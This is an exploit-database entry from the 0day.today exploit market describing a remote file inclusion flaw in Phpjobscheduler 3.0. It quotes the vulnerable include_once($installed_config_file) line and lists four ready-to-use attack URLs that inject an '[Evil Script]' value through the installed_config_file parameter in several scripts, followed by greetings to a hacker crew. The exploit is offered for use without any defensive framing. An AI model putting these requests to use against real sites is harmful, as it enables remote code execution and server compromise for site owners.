[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities

Author
Firewall
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1160
Category
web applications
Date add
13-11-2006
Platform
unsorted
========================================================================
Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities
========================================================================



======================================================================
# Phpjobscheduler 3.0  - Multiple Remote File Include by Firewall
                     

# Application Affect:
                   phpjobscheduler 3.0


# Code:
                   include_once($installed_config_file)
       
# ExPloit :
   http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=[Evil Script]


# GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|

 "El ceviche y El pisco es peruano y jamas podran igualar su calidad"
                         "Viva el Peru"

======================================================================




#  0day.today [2024-12-26]  #